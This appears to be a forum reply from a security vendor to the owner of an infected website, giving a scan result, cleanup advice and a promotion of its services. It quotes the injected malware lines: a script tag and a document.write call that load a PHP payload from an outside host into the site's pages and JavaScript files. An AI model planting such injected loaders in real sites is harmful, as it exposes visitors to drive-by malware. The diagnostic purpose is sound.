Hello :-),
Jaal Scan ID # 390390252749-825 output
Malicious code detected on line 7 of www.coastalcashexchange.com
starts with
<!—Scr ipts/AC_RunActive Content.js>
Please look at the copy of the page on the server, if you cannot locate this code, it is probably being injected at runtime, when a user is requesting the page. It might be useful to then wipe out the hosting directory and check for malware, on the server and in the backend database. You can also ask for help from your hosting provider. Please check out other pages too.
If you have any specific issues feel free to ask for help.
Also, I am collecting info from people affected by attacks like this, if it would be possible for you to share your experience, could you kindly shoot me a mail at a.banerje e @ s top the hac ker .com (please remove the spaces).
We also provide vulnerability identification and mitigation services to help websites from being infected in the first place.
It might be useful to go through my blog post:
http://www.stopthehacker.com/2009/10/28/when-benign-scripts-attack/
Hope this helps,
-A
Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
Site:www.stopthehacker.com
Blog:www.stopthehacker.com/blog
Jaal: Protecting the Internet, one website at a time™
This line is present in your files
<sc ript src=http://worphueser.de/032c0698b3108c214/032c0698b31084b13.php >
located between the </head> and <body> tags. If you do not see it in the source for your pages it is being inserted when the page is requested.
It is also present in your javascript files such as
http://www.coastalcashexchange.com/Scripts/AC_RunActiveContent.js
http://www.coastalcashexchange.com/Scripts/swfobject_modified.js
http://www.coastalcashexchange.com/SpryAssets/SpryMenuBar.js
by the line(s)
document.write(‘<scr ipt
src=http://worphueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>’);
